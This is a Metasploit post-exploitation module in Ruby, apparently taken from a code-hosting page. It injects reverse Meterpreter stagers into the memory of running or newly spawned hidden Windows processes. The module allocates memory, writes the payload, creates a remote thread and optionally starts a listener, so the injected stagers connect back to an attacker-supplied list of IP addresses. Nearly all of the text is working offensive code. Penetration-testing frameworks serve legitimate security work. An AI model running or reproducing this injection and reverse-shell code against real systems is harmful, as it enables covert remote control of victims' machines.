Path: blob/master/modules/post/windows/manage/multi_meterpreter_inject.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Windows Manage Inject in Memory Multiple Payloads',12'Description' => %q{13This module will inject into several processes a given14payload and connect to a given list of IP addresses.15The module works with a given lists of IP addresses and16process IDs if no PID is given it will start the given17process in the advanced options and inject the selected18payload into the memory of the created module.19},20'License' => MSF_LICENSE,21'Author' => [22'Carlos Perez <carlos_perez[at]darkoperator.com>',23'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support24],25'Platform' => [ 'win' ],26'SessionTypes' => ['meterpreter'],27'Compat' => {28'Meterpreter' => {29'Commands' => %w[30stdapi_sys_process_attach31stdapi_sys_process_execute32stdapi_sys_process_memory_allocate33stdapi_sys_process_memory_write34stdapi_sys_process_thread_create35]36}37},38'Notes' => {39'Stability' => [CRASH_SERVICE_DOWN],40'SideEffects' => [],41'Reliability' => []42}43)44)4546register_options(47[48OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', 'windows/meterpreter/reverse_tcp']),49OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),50OptString.new('IPLIST', [true, 'List of semicolon separated IP list.', Rex::Socket.source_address('1.2.3.4')]),51OptString.new('PIDLIST', [false, 'List of semicolon separated PID list.', '']),52OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),53OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])54]55)5657register_advanced_options(58[59OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])60]61)62end6364def run65unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)66print_error('This module requires native Windows meterpreter functions not compatible with the selected session')67return68end6970hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']71print_status("Running module against #{hostname} (#{session.session_host})")7273# Set variables74multi_ip = nil75multi_pid = nil7677if datastore['HANDLER']78create_multi_handler(datastore['PAYLOAD'], datastore['LPORT'])79end8081multi_ip = datastore['IPLIST'].split(';')82multi_pid = datastore['PIDLIST'].split(';')8384datastore['AMOUNT'].times do # iterate through number of shells85multi_ip.zip(multi_pid).each do |a|86# Check if we have an IP for the session87payload = create_payload(datastore['PAYLOAD'], a[0], datastore['LPORT'])88if a[1]89inject(a[1], payload)90else91# if no PID we create a process to host the Meterpreter session92pid_num = start_proc(datastore['PROCESSNAME'])93inject(pid_num, payload)94end95select(nil, nil, nil, 5)96end97end98end99100# Function for injecting payload in to a given PID101#-------------------------------------------------------------------------------102def inject(target_pid, payload_to_inject)103print_status("Injecting meterpreter into process ID #{target_pid}")104105host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)106raw = payload_to_inject.generate107mem = host_process.memory.allocate(raw.length + (raw.length % 1024))108109print_status("Allocated memory at address #{'0x%.8x' % mem}, for #{raw.length} byte stager")110print_status('Writing the stager into memory...')111host_process.memory.write(mem, raw)112host_process.thread.create(mem, 0)113print_good("Successfully injected Meterpreter into process: #{target_pid}")114rescue StandardError => e115print_error("Failed to inject payload into #{target_pid}!")116print_error(e.message)117end118119# Function for Creation of Connection Handler120#-------------------------------------------------------------------------------121def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')122print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")123mul = client.framework.exploits.create('multi/handler')124mul.datastore['WORKSPACE'] = session.workspace125mul.datastore['PAYLOAD'] = payload_to_inject126mul.datastore['LHOST'] = rhost127mul.datastore['LPORT'] = rport128mul.datastore['EXITFUNC'] = 'process'129mul.datastore['ExitOnSession'] = false130131mul.exploit_simple(132'Payload' => mul.datastore['PAYLOAD'],133'RunAsJob' => true134)135print_good('exploit/multi/handler started!')136end137138# Function for Creating the Payload139#-------------------------------------------------------------------------------140def create_payload(payload_type, lhost, lport)141print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")142payload = payload_type143pay = client.framework.payloads.create(payload)144pay.datastore['LHOST'] = lhost145pay.datastore['LPORT'] = lport146return pay147end148149# Function starting notepad.exe process150#-------------------------------------------------------------------------------151def start_proc(proc_name)152print_good('Starting Notepad.exe to house Meterpreter Session.')153proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })154print_good("Process created with pid #{proc.pid}")155return proc.pid156end157end158159160